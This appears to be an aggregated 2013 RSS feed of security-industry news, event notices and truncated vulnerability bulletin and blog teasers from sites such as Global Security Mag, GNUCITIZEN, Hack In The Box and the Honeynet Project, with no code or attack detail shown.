http://www.globalsecuritymag.com/spip.php?page=backend SMARTRAC N.V., the developer, manufacturer, and supplier of RFID transponders and inlays, announced the introduction of its new UHF EPC compliant WebLite inlay. The SMARTRAC WebLite inlay represents a technological advance in both size and performance. With an antenna size of only 46 x 15 mm (1.8 x 0.6 in), it is especially suited for item-level tagging and identification where RFID tag space is limited and performance is of critical importance. Due to its compact form and special design, (...) - Product Reviews

==> Chen Lifang: Huawei Committed to Open IPR Licensing System and to Enhancing Europe's Role as a Global Innovation Leader

http://www.globalsecuritymag.com/spip.php?page=backend Huawei respects and protects intellectual property rights (IPR) and is committed to an open IPR licensing system, said Chen Lifang, Huawei Board Member and Senior Vice President, today in her speech at the EU Science: Global Challenges, Global Collaboration (ES:GC2) conference in Brussels. The IP that Huawei develops and acquires as a result of our participation in European scientific research initiatives will first be applied in Europe in order to help improve Europe's global leadership in (...) - Opinion

==> Tyco identifies key security trends that will shape the industry in 2013 and beyond

http://www.globalsecuritymag.com/spip.php?page=backend Tyco Integrated Fire and Security, a Tyco company which designs, installs and services fire and electronic security systems for commercial, industrial, residential and government customers, has drawn on its experience and reach in the market to identify the key security trends that will influence the industry in Europe in the coming years. Global macroeconomic trends such as urbanisation, an increasingly globalised workforce, rising cybercrime, the threat of terrorism and economic (...) - Special Reports

==> Datum partners with Vtesse for high bandwidth datacentre connectivity services

http://www.globalsecuritymag.com/spip.php?page=backend Datum, the Business-Class datacentre provider, announces its partnership with Vtesse, the leading UK business communications provider, to deliver high bandwidth connectivity into its newly built datacentre, located in the highly secure QinetiQ Cody Technology Park, in Farnborough. Vtesse has implemented diverse fibre routes into the site to provide Datum clients with fully resilient, high bandwidth connectivity and IP Transit service. The solution provides connectivity into Vtesse's robust, (...) - Business News

==> Vigil@nce - MIMEsweeper for SMTP: Cross Site Scripting via authentication

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can trigger a Cross Site Scripting in MIMEsweeper for SMTP, in order to execute JavaScript code in the context of the web site. Impacted products: MIMEsweeper Severity: 2/4 Creation date: 19/02/2013 DESCRIPTION OF THE VULNERABILITY The PMM (Personal Message Manager) component of MIMEsweeper for SMTP allows users to manage their spam emails. An (...) - Security Vulnerability

==> Vigil@nce - nss-pam-ldapd: memory corruption via FD_SET

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can open several files with an application using nss-pam-ldapd, in order to stop the service, and possibly to execute code. Impacted products: Debian, Fedora, RHEL, Unix (platform) Severity: 2/4 Creation date: 18/02/2013 DESCRIPTION OF THE VULNERABILITY The nss-pam-ldapd module processes the LDAP authentication. The select() system call monitors events (...) - Security Vulnerability

==> Vigil@nce - Cisco Secure ACS, Prime: privilege elevation

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An authenticated attacker can use a vulnerability of the CLI (command-line interface), in order to execute a shell command with root privileges. Impacted products: Cisco Prime, Secure ACS Severity: 2/4 Creation date: 18/02/2013 DESCRIPTION OF THE VULNERABILITY An authenticated attacker can use a vulnerability of the CLI (command-line interface), in order to execute a (...) - Security Vulnerability

==> Vigil@nce - Cisco Unity Connection: denial of service via TCP

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY An attacker can open several TCP sessions on Cisco Unity Connection, in order to deplete memory resources, to progressively create a denial of service. Impacted products: Cisco Unity Severity: 2/4 Creation date: 18/02/2013 DESCRIPTION OF THE VULNERABILITY An attacker can open several TCP sessions on Cisco Unity Connection, in order to deplete memory resources, to (...) - Security Vulnerability

==> Vision-Box® unveils a new biometric periscope at AVSEC

http://www.globalsecuritymag.com/spip.php?page=backend Vision-Box S.A. introduced today its new biometric periscope, for simultaneous capture of face and iris, at a distance. Vision-Box S.A. unveiled, during AVSEC 2013, a new biometric periscope, which upon detecting the user, automatically adjusts height and illumination to allow simultaneous, full-frontal ICAO compliant iris & face capture and matching. The self-service process takes place in a very organic and intuitive way. The user can keep walking and is not required to make any (...) - Product Reviews

==> Matrix and Voxbone complete Interoperability test for Voice Services

http://www.globalsecuritymag.com/spip.php?page=backend Matrix Comsec, manufacturer of IP-PBXs and VoIP-GSM Gateways, announced the successful completion of interoperability testing with Voxbone, a market leader in providing worldwide geographical, toll-free and iNum telephone numbers. Matrix's IP Phone Systems, VoIP Gateways and Adaptors are ideal IP telephony solutions for SMB users that wish to compete and grow their businesses over time. SIP trunking has been offering dramatic reductions in cost over traditional digital telephony services. This (...) - Business News

==> Cassidian CyberSecurity and Netasq launch a new Approach to combat APT

http://www.globalsecuritymag.com/spip.php?page=backend Cassidian CyberSecurity and Netasq launch a new 7 Step Approach to combat cyber attacks in the Middle East. As organizations need a trusted partner with the expertise to manage and execute a comprehensive response plan, Cassidian CyberSecurity has developed a 7 Step Approach, combining expertise, processes and tools, which have never been used before, to successfully combat APTs: raising awareness, initial check, deeper analysis, cleaning, reconnection, recovery and remote supervision. (...) - Product Reviews

==> Vigil@nce - Linux kernel: privilege elevation via PTRACE_SETREGS

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY A local attacker can create a program using ptrace(), in order to alter the execution procedure, to elevate his privileges. Impacted products: Debian, Linux, RHEL, SUSE Linux Enterprise Desktop, SLES Severity: 2/4 Creation date: 18/02/2013 DESCRIPTION OF THE VULNERABILITY The systrace() system call tracks and controls the execution of a process. The PTRACE_GETREGS and (...) - Security Vulnerability

==> IGEL Thin Clients Embed DigitalPersona Fingerprint Recognition Technology to Secure and Speed Access to Virtual Desktops

http://www.globalsecuritymag.com/spip.php?page=backend IGEL Technology, one of the world's leading manufacturers of thin clients, and DigitalPersona, Inc., a trusted partner for biometric identity verification solutions, announced they have integrated their technologies to allow the use of fingerprint biometrics as an authentication credential to virtual applications hosted on a Citrix XenApp server. IGEL Linux now supports the management of users' credentials on Citrix XenApp servers with DigitalPersona Pro Enterprise v5.3 and v5.4 (...) - Product Reviews

==> G Data CloseGap - smart virus protection technology

http://www.globalsecuritymag.com/spip.php?page=backend After several years of development, G Data will introduce its new antivirus technology "Made in Germany" as a world premiere at CeBIT 2013: G Data CloseGap Active Hybrid Protection that fends off malware and online attacks. G Data CloseGap is more than just AV technology and breaks new ground technologically. It supplements proactive defence technologies like BankGuard, WebCloud and BehaviourBlocker with signature-based detection and protection technologies. Thanks to its modular structure (...) - Product Reviews

==> Airlines to overtake energy companies in targeting mobile consumers: annual spend to reach $37 million per company by 2015

http://www.globalsecuritymag.com/spip.php?page=backend Energy, telecommunications and airline firms are taking the lead in spending to engage consumers through their mobile devices, according to The New Digital Mobile Consumer global trend report. Commissioned by Tata Consultancy Services (TCS), the research reveals that average expenditure within the companies surveyed in these sectors during 2012 was between $27 million and $31 million per company. During 2012, energy companies spent an average of $30.8 million per company in targeting mobile (...) - Special Reports

==> VASCO launches DIGIPASS 870 with "what you see is what you sign" functionality

http://www.globalsecuritymag.com/spip.php?page=backend In connected mode DIGIPASS 870 can be used for a number of PKI-based, e-banking or e-wallet applications making use of the 'what you see is what you sign' functionality. Important transaction data such as amount, account and reference number will be displayed on the device and must be confirmed by the user by entering a PIN code and approving the transaction. This WYSIWYS functionality enables users to actually see which transaction they are signing. The e-signature functionality provides (...) - Product Reviews

==> 7-8 March: APWG Unites Cybercrime Fighters from Research and Law Enforcement Sectors in Dublin

http://www.globalsecuritymag.com/spip.php?page=backend The third annual APWG eCrime Researchers Sync-Up will be held here March 7th and 8th, 2013, gathering cybercrime fighters from around the world. This is a two-day exchange of presentations and discussions related to eCrime research in progress - and for networking of researchers and cybercrime law enforcement officers within the disciplines that are defining the eCrime forensic field today. The Sync-Up, begun three years ago in collaboration with University College Dublin (UCD) as a (...) - EVENTS

==> Websense TRITON Trumps All Vendors Within Independent Security Effectiveness Test

http://www.globalsecuritymag.com/spip.php?page=backend Miercom, the well-respected worldwide testing service, recently conducted one of the largest independent tests of real-world threat protection capabilities of web security systems. Results show that Websense, Inc. demonstrated superior security effectiveness, threat detection and mitigation capabilities over the other tested systems. The test pitted Websense TRITON Web Security Gateway Anywhere, powered by the Websense Advanced Classification Engine (ACE), against web security systems (...) - MAGIC QUADRANT

==> Cassidian CyberSecurity awarded consultancy contract by Oil and Gas company in the Middle East

http://www.globalsecuritymag.com/spip.php?page=backend Cassidian CyberSecurity has been awarded a consultancy contract by a major Oil and Gas company in the Middle East. The contract consists of establishing governance of the company's IT security of Industrial Control Systems (ICS), also called SCADA (Supervisory Control And Data Acquisition). The objective is to define the accountability of SCADA security within the company and the roles and responsibilities of the various stakeholders, mainly from IT and Automation departments. The (...) - Market News

==> CeBIT 2013 (5–9 March, Tue.–Sat.) “Shareconomy” is keynote theme for CeBIT 2013

http://www.globalsecuritymag.com/spip.php?page=backend After Cloud Technology in 2011 and Managing Trust in 2012, Shareconomy is the keynote theme for CeBIT 2013. "Cloud-based applications are clearly on the rise, and have now earned user trust. As the world's most important event for the digital economy, CeBIT will spotlight this sweeping trend that emphasizes sharing knowledge, resources and experience to create new forms of collaboration," said Frank Pörschmann, Member of the Managing Board at Deutsche Messe. New information and communications (...) - EVENTS

==> NoSuchCon conference : Call for Paper

http://www.globalsecuritymag.com/spip.php?page=backend The first edition of the NoSuchCon conference will take place in Paris from the 15th to the 17th of May 2013. NSC is the badass bleep technical security conference. Of death. NoSuchCon (NSC) is a fork (think continuation) from the Hackito Ergo Sum conference. When you participate in some given open source software, if you submit patches, and if the project owner doesn't accept your contribution, you could fork from it. Long story short: that's exactly what happened inside the Hackito (...) - EVENTS

==> Wick Hill To Distribute Becrypt Data Security Solutions

http://www.globalsecuritymag.com/spip.php?page=backend VAD Wick Hill is to become a UK distributor for leading cyber security solutions vendor Becrypt. Becrypt provides enterprise security and endpoint security solutions for desktops, laptops, tablets, USB sticks, mobile devices and removable media devices. Ian Kilpatrick, chairman Wick Hill Group, commented: Becrypt is a valuable addition to our portfolio and has a lot to offer our channel partners. It is one of the major players in the field, providing market-leading solutions, and is (...) - Business News

==> Vigil@nce - Linux kernel: denial of service via USB io_ti

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY A local attacker can unplug a USB-Serial converter, whereas it is still used, in order to dereference a NULL pointer, which stops the kernel. Impacted products: Linux Severity: 1/4 Creation date: 27/02/2013 DESCRIPTION OF THE VULNERABILITY The drivers/usb/serial/io_ti.c file implements the module to manage Edgeport converters for Serial port, which are connected on (...) - Security Vulnerability

==> Vigil@nce - NetBSD: denial of service via kqueue

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY A local attacker can use the kqueue() and kevent() functions on a malicious file descriptor, in order to stop the system. Impacted products: NetBSD Severity: 1/4 Creation date: 27/02/2013 DESCRIPTION OF THE VULNERABILITY The kqueue() system call requests the kernel to inform the process when some events occur. The kevent() function is used to alter the list of events (...) - Security Vulnerability

==> Be Part of Asia's Largest ICT Trade Fair & Exhibitions this March 2013!

http://www.globalsecuritymag.com/spip.php?page=backend With vast experience in organizing and managing ICT based industry events, JFPS Group has recently launched four more technology focused trade fairs and exhibitions scheduled on 20-21 March 2013, at Putra World Trade Centre, Kuala Lumpur, Malaysia. Spanning over 7000 sqm of exhibition space, Mobile & Wireless Technology 2013 (www.mobilewirelesstech.com), Digital Marketing & Advertising Showcase 2013 (www.madverts.asia), 2nd Annual Infosecurity World Exhibition & Conference (...) - EVENTS

==> Vigil@nce - Symantec PGP, Encryption Desktop: privilege elevation

http://www.globalsecuritymag.com/spip.php?page=backend This bulletin was written by Vigil@nce : http://vigilance.fr/offer SYNTHESIS OF THE VULNERABILITY A local attacker can use two vulnerabilities of Symantec PGP/Encryption Desktop, in order to execute code with system privileges. Impacted products: Symantec Encryption Desktop, PGP Desktop Severity: 2/4 Creation date: 15/02/2013 DESCRIPTION OF THE VULNERABILITY The Symantec PGP/Encryption Desktop product installs the pgpwded.sys driver. However, it is impacted by (...) - Security Vulnerability

==> 20-21 March 2013, PWTC Kuala Lumpur Malaysia

http://www.globalsecuritymag.com/spip.php?page=backend Mobile & Wireless Technology 2013: Connected devices have become a global phenomenon and the trend is expected to last. The total number of connected devices increases by more than 150 percent throughout the decade, with over 11 billion connected devices in total, and the revenue opportunity for mobile and wireless operators in this space by 2020 is approximately US$1.2 trillion. Whilst the relatively mature markets of Europe and North America continuously fight for the market (...) - EVENTS

==> Secutech announces the date for its 2013 show

http://www.globalsecuritymag.com/spip.php?page=backend Secutech 2013, the business platform for global security players, will be held from 24-26 April 2013 at the Taipei Nangang Exhibition Center in Taiwan. Organised by Messe Frankfurt New Era Business Media Ltd, the 16th edition of the show is a business platform for global security professionals to find new business opportunities as well as enhance their brand reputation. The 2013 show is expected to attract 560 exhibitors and welcome more than 26,000 professional visitors, especially from (...) - EVENTS

==> 19 March - 29 May: DenyAll's upcoming Webinars cover the following key themes: BYOD, migration, virtual patching and

http://www.globalsecuritymag.com/spip.php?page=backend March 19: Beyond BYOD, featuring Promon's CTO and founder, Tom Lysemose. The webinar will focus on how to ensure that corporate data remains secure while being accessed by devices that don't comply with corporate policy. The innovative Client Shield solution for Web and mobile applications will be presented. March 26: why and how to migrate to DenyAll Protect version 4.1? This webinar will highlight the advantages of the new platform and present the methodology used by DenyAll to support (...) - EVENTS

==> Landing Proxify

http://www.gnucitizen.org/feed/ I am really happy to announce the first release of proxify. I started writing this tool several years ago but I was never able to finish it. The first release (version 1.0) is now available for download on all platforms: Linux, Mac and Windows. What is Proxify? The idea behind Proxify is to create a proxy that is just good at doing proxying. It is the proxy of all proxies, so to say. [...]

==> Fuzzing XML and JSON Pt.1

http://www.gnucitizen.org/feed/ It is hard to get back to blogging especially when there are easier alternatives to scratch your itch – I am talking about twitter. However, I decided to make the effort and see where it takes me. It will be difficult initially but practice leads to continuous improvement. What I would like to do is to highlight some of the work I did to take two relatively simple and straightforward penetration testing practices to the next level: this is XML and JSON fuzzing. [...]

==> You and Your Research

http://www.gnucitizen.org/feed/ This is really one of my favourite talks from this year’s HITB in KL. @haroonmeer did an exceptional job at describing what it takes to produce an exceptional piece of work/research and the various pitfalls and sacrifices one needs to make.

==> Well Websecurify Runs on The iPhone

http://www.gnucitizen.org/feed/ This is not necessarily news anymore since it was discussed on the Websecurify official blog but we are so excited about it that we could not hold ourselves from posting it here too. The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. [...]

==> Stuxnet

http://www.gnucitizen.org/feed/ I have been avoiding the topic of Stuxnet for quite some time, mainly because there were many others who spent the time to take the virus apart. However, here is a video, which I find rather amusing: Whether this is the real deal or simply fear mongering, I simply don’t know. It is all speculation at the moment. [...]

==> Having fun with BeEF, the browser exploitation framework

http://www.gnucitizen.org/feed/ We haven’t featured any guest bloggers in a while, but we’re glad to be featuring Christian Frichot this month! Christian is a security professional based in Perth, Western Australia. He’s currently working in the finance industry as part of a tight-knit internal team of security consultants doing their best to protect their business and customers from technical threats such as malware or insecure web applications. [...]

==> ColdFusion directory traversal FAQ (CVE-2010-2861)

http://www.gnucitizen.org/feed/ A new Adobe hotfix for ColdFusion has been released recently. The vulnerability, which was discovered by Richard Brain, was rated as important by Adobe and could affect a large number of Internet-facing web servers. The FAQ below is meant to shed some light on this vulnerability so that ColdFusion administrators can understand what they’re up against. [...]

==> 1ST European Edition of HITB Coming Up!

http://www.gnucitizen.org/feed/ In case you haven’t heard yet, HITBSecConf is hosting the first European Edition of their conference in Amsterdam during 1st-2nd July ’10. The history of the HITB conferences can be traced back to 2002, the year in which the first ever edition of HITB took place in Malaysia. Since then, HITB has grown to become the biggest technical computer security event in Asia and has extended their presence to the Middle East and now Europe. [...]

==> Hacking Linksys IP Cameras (pt 6)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: here, here, here, here and here. As we know, there are several ways one could go about hunting for IP cameras on the net. The slowest way would be to portscan random IP addresses for certain ports and programmatically detect if the web interface of a given camera was available on the open ports found. [...]

==> Dnsmap v0.30 is now out!

http://www.gnucitizen.org/feed/ After working on dnsmap for a few months whenever time allowed, I decided there were enough additional goodies to make version 0.30 a new public release. Let me just say that a lot of the bugs that have been fixed and features that have been added in this version would not have been possible without the feedback from great folks such as Borys Lacki (www.bothunters.pl), Philipp Winter (7c0.org) and meathive (kinqpinz.info). Thanks guys, your feedback was highly valuable to me. [...]

==> Old-school Remote Command Exec Vulnerabilities on Avaya Intuity

http://www.gnucitizen.org/feed/ Remember those old remote command exec vulns where you had a CGI script such as a perl program which would take input from the client to construct command strings that would then be passed to the shell environment? Well, there were tons of those affecting diagnostic scripts available on the web interface of Avaya Intuity Audix LX. These vulnerabilities, although cool, are not critical since you need to be logged into the interface in order to exploit them. [...]

==> Skydive

http://www.gnucitizen.org/feed/ What is the best way to spend a quiet, weekend afternoon? – Jump off a perfectly working plane while 10,000 feet in the air. On 5th of July 2009, the GNUCITIZEN team and friends came together to perform a skydiving gig. [...]

==> Free Web Application Security Testing Tool

http://www.gnucitizen.org/feed/ Automated Web Application Security Testing tools are at the core of modern penetration testing practices. You cannot rely 100% on the results they produce without seriously considering their limitations. However, because these tools are so good at picking the low-hanging fruit by employing force and repetition, they still have a place in our arsenal of penetration testing equipment. These tools are not unfamiliar to modern day penetration testers. [...]

==> Of Sec Cons and Magstripe Gift Cards

http://www.gnucitizen.org/feed/ I’ve been meaning to talk about CONFidence and EUSecWest for quite a while, but May was such an intense month for me that it hardly left me with any time for other things. I eventually got caught up with other matters, which resulted in me publishing this post about 2 months late. I’ve been researching, pentesting, and preparing two different presentations which I gave at CONFidence in Krakow, and EUSecWest in London. pdp has also been busy presenting at AusCERT2009. [...]

==> CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

http://www.gnucitizen.org/feed/ I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow). [...]

==> Hacking Linksys IP Cameras (pt 5)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4). Mounting the filesystem on your workstation: There are many ways to mount the camera’s filesystem using the firmware binary. In this post, we’ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model. [...]

==> Breaking Into a Home With an iPhone

http://www.gnucitizen.org/feed/ This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch. Got the idea? No? Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. [...]

==> Extensions at War

http://www.gnucitizen.org/feed/ Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don’t know why. [...]

==> Exploit Sweatshop

http://www.gnucitizen.org/feed/ When I was playing with/introducing the partial disclosure practice a year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for substantial amounts of money. Of course, requests of that nature were kindly ignored. I couldn’t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce. [...]

==> Jeriko Group and Source Code Repository

http://www.gnucitizen.org/feed/ Jeriko moved into its own source code repository which you will be able to find here. There is also a discussion group here, if you feel like using it. The version inside the new code repository is very different from the version you’ve seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (wrapper around bash) which does the heavy lifting and also introduces some funky programming mechanisms. [...]

==> Cyber-war: Time for Malaysian agencies to step up

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Malaysia LAST month, US President Barack Obama issued an executive order to bolster his nation's cyber-defenses, a move unpopular with some hacker movements and civil society advocates, eagerly awaited by many, and considered insufficient by some experts. Tags: Malaysia, Hackers, Security, GOV

==> Pirate Bay to world: We're not really off to North Korea

http://www.hackinthebox.org/backend.php https://www.facebook.com/photo.php?fbid=383400901757540&set=a.203123029785329.41372.193763917387907&type=1 The Pirate Bay has admitted that its claim to have relocated its servers to North Korea was a hoax, and then had a pop at those who believed the file-sharing site the first time around. TPB surprised many when it claimed in a statement released earlier this week that it had been granted virtual asylum in the secretive Asian state, not least because of the poor internet infrastructure on offer there and the country's dubious human rights record. Tags: Piratebay, Industry News

==> First C compiler pops up on Github

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/C_%28programming_language%29 If you have a nostalgic turn of mind, there's a new posting over on Github that you'll just love: the earliest known C compiler by the legendary Dennis Ritchie has been published on the repository. It's not new: long before his death in 2011, Ritchie wrote about the effort to find, recover and preserve the early work on C here. Even as far back as 2001, the effort to recover the earliest life of one of the world's most important programming languages was considered computer industry palaeontology. Tags: Software-Programming

==> EBay develops 'miles per gallon' metric for data centers

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/EBay There's a maxim in the data center business that you can't manage what you can't measure, and eBay has come up with the mother of all measurement systems for calculating data center efficiency. The online auction giant has devised a methodology that looks at the cost of its IT operations in dollars, kilowatt hours and carbon emissions, and ties those costs back to a single performance metric -- in eBay's case, the number of buy and sell transactions its customers make at eBay.com. Tags: eBay, Industry News

==> Verizon Reports Illicit Images in Maryland Man's Cloud Storage

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Verizon_Communications Verizon Online notified authorities that a Catholic deacon had stored illegal images of bleep on the ISP's cloud storage service. Police charged a Maryland man on March 1 for allegedly possessing illicit images of bleep, following a tip from his cloud storage provider Verizon, which had detected the images in an online sweep of its service. Tags: Privacy, Law and Order, verizon

==> The Pirate Bay Moves to North Korea, Gets 'Virtual Asylum'

http://www.hackinthebox.org/backend.php http://torrentfreak.com/images/tpb-korea.png The Pirate Bay says it has been offered virtual asylum in North Korea. The move comes after the Norwegian Pirate Party was forced to stop routing traffic for the infamous BitTorrent site by a local copyright group. "We can reveal that we have been invited by the leader of the Republic of Korea, to fight our battles from their network," the Pirate Bay says. A traceroute indeed suggests that The Pirate Bay is now being routed through the dictatorial country. Tags: TPB, Korea, Industry News

==> How Facebook dug deep within Android to fix its mobile app

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2013/03/2013-03-04-17.30.42-300x533.png When Facebook's mobile app began misbehaving on an older version of Android in late 2012, Facebook engineers had to dive deep into Android's code to figure out what was causing the mishap. In a whiteboard session today at Facebook headquarters, mobile engineering director Mike Shaver described how Facebook identified a problem in Android itself, then created a workaround for its own app so users wouldn't have to suffer. Tags: Facebook, Android, Software-Programming

==> Google's Red Guide to the Android App Store

http://www.hackinthebox.org/backend.php http://static.guim.co.uk/sys-images/Guardian/Pix/pictures/2012/2/29/1330522756756/android.jpg As part of an industry that owes so much to Steve Jobs, we remember him on this day, the 58th anniversary of his birth, with great sadness but also with gratitude. Of Steve's many achievements, we particularly want to celebrate the Apple App Store, the venerable purveyor of iPhone software. Tags: Google, Android

==> Gang arrested for hacking Dubai exchange companies' accounts

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Dubai The Dubai Police have arrested a cyber crime gang who were able to transfer more than Dh7 million from exchange companies in Dubai, a senior official from Dubai Police said. Major General Khamis Matter Al Mazeina, acting chief of Dubai Police, said on Sunday that a gang of Asians and Africans work with hackers in order to enter different websites and systems of different companies here in Dubai in order to transfer money inside and outside the country. Tags: UAE, Hackers, Law and Order

==> 61-Year-Old Hacker Convicted in Texas

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Texas The FBI recently announced that Michael Musacchio, 61, of Plano, Texas was found guilty of conspiring to hack into his former employer's computer network. Musacchio was the president of transportation company Exel Transportation Services from 2002 until he left the company in 2004 to form competitor Total Transportation Services along with fellow Exel employees Joseph Roy Brown and John Michael Kelly. Tags: Security, US, Hacker, Law and Order

==> Malaysian and Filipino hackers call for 'ceasefire' after weekend of attacks

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Malaysia Malaysian and Filipino hackers waged a cyber war over the weekend before stopping a little after midnight on Monday. Hackers claiming to be from the Malaysian and Filipino chapters of the hacktivist group Anonymous attacked websites of both countries. Tags: Malaysia, Philippines, Hackers, Security

==> Oracle issues emergency Java update to patch vulnerabilities

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Java_%28programming_language%29 In response to discovering that hackers were actively exploiting two vulnerabilities in Java running in Web browsers, Oracle has released an emergency patch that it says should deal with the problem. Tags: Oracle, Java, Security

==> Two more big financial firms warn of hacking threat

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Citibank Goldman Sachs and Citigroup have stepped up warnings to shareholders about cyberattacks as the U.S. government has prodded banks and government agencies to bolster defenses. Online and mobile banking give new points of entry that can be used to disrupt operations, the two New York-based firms said last week in annual regulatory filings. The companies said they're vulnerable to tactics that overload websites to shut off public access, such as assaults that disrupted the nation's largest lenders last year. Tags: Security

==> Five features iOS should steal from Android

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2013/03/apple-heart-android.jpg If you've come anywhere near a tech site in the last year or so, you've heard it all before. "iOS is getting stale compared to Android! It needs some new ideas!" Whether that's actually true is up for (heated) debate, but those with an open mind are usually willing to acknowledge that Apple and Google could afford to swap a few ideas when it comes to their mobile OSes. Tags: Android, iOS, Google, Apple

==> Use decoy and deception to mess with hackers

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/scudderslane/1467764261/ Security experts say organisations should use deception and decoy data in efforts to kick attackers out of corporate networks. The vendor-based security professionals said attackers spent big money on maintaining a foothold within networks. Tags: Hackers, Security

==> Jailed hacker allowed into IT class, hacks prison computers

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/publik15/3426818985/ They're arguing now about who let it happen, but happen it did, with entertaining consequences. Somehow Nicholas Webber found himself in an IT class while in jail. He's serving five years for creating a site called GhostMarket, which allowed those interested in creating computer viruses, partaking of stolen IDs and enjoying private credit card data to congregate. Tags: Hacker, Security, Law and Order

==> Bug bounties recognised in infosec qualifications

http://www.hackinthebox.org/backend.php https://www.savidtech.com/blog/it-security/security-bug-bounty-hunters-rewarding-users-finding-vulnerabilities/ The International Information Systems Security Certification Consortium ((ISC)²) has recognised the contribution that bug bounties can have in building security professionals' qualifications, accepting Aussie startup Bugcrowd's bounties as a means to fulfill Certified Information Systems Security Professional (CISSP) accreditation requirements. According to Bugcrowd co-founder and CEO Casey Ellis, it is the first time a crowdsourced model has been accepted as a means to recognise a security professional's abilities. Tags: Security, Industry News

==> GSoC 2013 Announced

http://www.honeynet.org/rss.xml Like many other open source organizations, The Honeynet Project's members have been excitedly waiting to hear if Google would be running their Google Summer of Code (GSoC) initiative again this year. Well, the wait is over and GSoC 2013 has officially been announced on Google's Open Source Blog. This is great news!

==> Cuckoo Sandbox 0.5 is out!

http://www.honeynet.org/rss.xml Claudio has just released a new version of Cuckoo Sandbox 0.5. The list of new features is very impressive! Check it out at http://cuckoosandbox.org/2012-12-20-to-the-end-of-the-world.html.

==> Donate to the Honeynet Project

http://www.honeynet.org/rss.xml In many countries, it's the time of the year you can make tax deductible donations to support your favorite charity and non-profit organization. I'd like to ask you to consider donating to the Honeynet Project this year. The Honeynet Project is a 501c3 non-profit organization (EIN: 36-4460128) that - over the past decade - learned the tools, tactics and motives involved in computer and network attacks, and shared the lessons learned with the public. Along the way, we have authored and published many open-source tools to capture & analyze attacks. If you would like to support the cause, please donate. Happy Holidays to all of you. Christian Seifert CEO, The Honeynet Project

==> UK Chapter Annual Status Report 2011/2012

http://www.honeynet.org/rss.xml The UK Chapter's annual status report for 2011/2012 has been published at http://www.ukhoneynet.org/2012/12/04/uk-honeynet-project-chapter-annual-status-report-for-20112012/.

==> ENISA publishes report on honeypots

http://www.honeynet.org/rss.xml ENISA (The European Network and Information Security Agency) under the leadership of CERT Polska has published a report on honeypots. It's a hands-on guide on the various honeypot technologies out there, looking at various operational aspects such as extensibility, reliability, ease of deployment, etc. If you are considering running a honeypot, this is a must read! Check it out at http://www.enisa.europa.eu/media/press-releases/new-report-by-eu-agency-enisa-on-digital-trap-honeypots-to-detect-cyber-attacks. Great job, ENISA!

==> Press Release: 2013 Honeynet Project Workshop

http://www.honeynet.org/rss.xml THE HONEYNET PROJECT
Contact: Christian Seifert, Phone: +1-206-2651944, 1425 Broadway #438, Seattle, WA, 98122
FOR IMMEDIATE RELEASE, 9 A.M. GST, November 26th, 2012

2013 HONEYNET PROJECT ANNUAL WORKSHOP, 10-12 FEBRUARY 2013 IN DUBAI, UAE

DUBAI, 26 NOV 2012: This three-day event features an exceptional collection of international security professionals presenting the latest research tools and findings in malware analysis. The twelfth annual workshop will be held at The Address Dubai Mall Hotel on the 10th through 12th of February, 2013, with sponsorship and support from the UAE Honeynet Project chapter, United Arab Emirates Computer Emergency Response Team (aeCERT), and the Pakistan Honeynet Project chapter. The workshop includes one full day of briefings and two full days of hands-on tutorial trainings.

Founded in 1999, The Honeynet Project is a non-profit international research organization dedicated to improving the security of the Internet at no cost to the public.

